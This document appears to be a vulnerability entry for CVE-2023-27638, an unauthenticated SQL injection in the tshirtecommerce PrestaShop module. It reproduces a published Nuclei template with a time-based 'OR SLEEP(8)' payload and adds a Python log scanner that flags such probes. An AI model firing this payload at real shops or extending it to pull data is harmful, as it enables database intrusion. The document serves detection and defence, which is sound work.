The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the tshirtecommerce_design_cart_id parameter, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database. The root cause is missing input sanitization of that parameter; the vendor's patch now wraps it in pSQL() before it reaches the query.
PoC code (published)
id: CVE-2023-27638

info:
  name: tshirtecommerce PrestaShop Module - SQL Injection
  author: ritikchaddha
  severity: high
  description: |
    The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the tshirtecommerce_design_cart_id parameter, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database. This is due to lack of input sanitization, as shown in the patch where pSQL() is now used.
  remediation: |
    Update the tshirtecommerce module to the latest version and apply all security patches.
  reference:
    - https://security.friendsofpresta.org/module/2023/03/21/tshirtecommerce_cwe-89.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27638
  classification:
    cve-id: CVE-2023-27638
    cwe-id: CWE-89
    epss-score: 0.4973
    epss-percentile: 0.97741
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: tshirtecommerce
    product: prestashop
    fofa-query: body="Prestashop" && body="tshirtecommerce"
  tags: cve,cve2023,prestashop,tshirtecommerce,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - "contains_all(tolower(body), 'prestashop', 'tshirtecommerce')"
          - "status_code == 200"
        condition: and
    internal: true

  - raw:
      - |
        @timeout: 30s
        GET /module/tshirtecommerce/designer?tshirtecommerce_design_cart_id=1%20OR%20SLEEP(8) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=8"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100acfc3808b799f5b3e3b351a085cb051c8cd6dc45df8b4edd90f670ee16cd1c34022100811702ca30246f571eaacaf01545f7a8c0ba6611bb5d09689cd1c626c568e5d7:922c64590222798bb761d5b6d8e72950
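As an added defender-side example (not part of the template above or of the module's own code), the following Python scans web-server access-log lines for requests to the designer endpoint whose tshirtecommerce_design_cart_id is anything other than a plain integer, which is the shape a probe for this CVE takes. The combined log format and the sample entries are constructed assumptions; the payload in the second sample line is the one from the template.

```python
"""Flag access-log requests that hit the tshirtecommerce designer endpoint
with a non-numeric tshirtecommerce_design_cart_id (CVE-2023-27638 probes)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [21/Mar/2023:10:00:01 +0000] "GET /module/tshirtecommerce/designer?tshirtecommerce_design_cart_id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [21/Mar/2023:10:00:09 +0000] "GET /module/tshirtecommerce/designer?tshirtecommerce_design_cart_id=1%20OR%20SLEEP(8) HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.12 - - [21/Mar/2023:10:00:12 +0000] "GET /index.php?controller=product&id_product=7 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.13 - - [21/Mar/2023:10:00:15 +0000] "GET /module/tshirtecommerce/designer?tshirtecommerce_design_cart_id=1+OR+SLEEP(8) HTTP/1.1" 200 5120 "-" "python-requests/2.28"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PARAM = "tshirtecommerce_design_cart_id"
PATH = "/module/tshirtecommerce/designer"


def suspicious_value(value):
    """A cart id is an integer; any other content is an injection probe."""
    return not value.isdigit()


def scan_log(text):
    """Return (ip, timestamp, decoded value) for every request to the designer
    endpoint whose cart id parameter is not a plain integer."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m.group("target"))
        if url.path != PATH:
            continue
        # parse_qs percent-decodes once and turns '+' into a space, so the
        # encoded SLEEP payload from the template is compared in clear text.
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if suspicious_value(value.strip()):
                hits.append((m.group("ip"), m.group("ts"), value.strip()))
    return hits


if __name__ == "__main__":
    for ip, ts, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} probed {PARAM} with {value!r}")
```

A matching hit is a reason to check whether the module is at a patched version and to look at the response time of that request, since the template's probe relies on an 8-second delay.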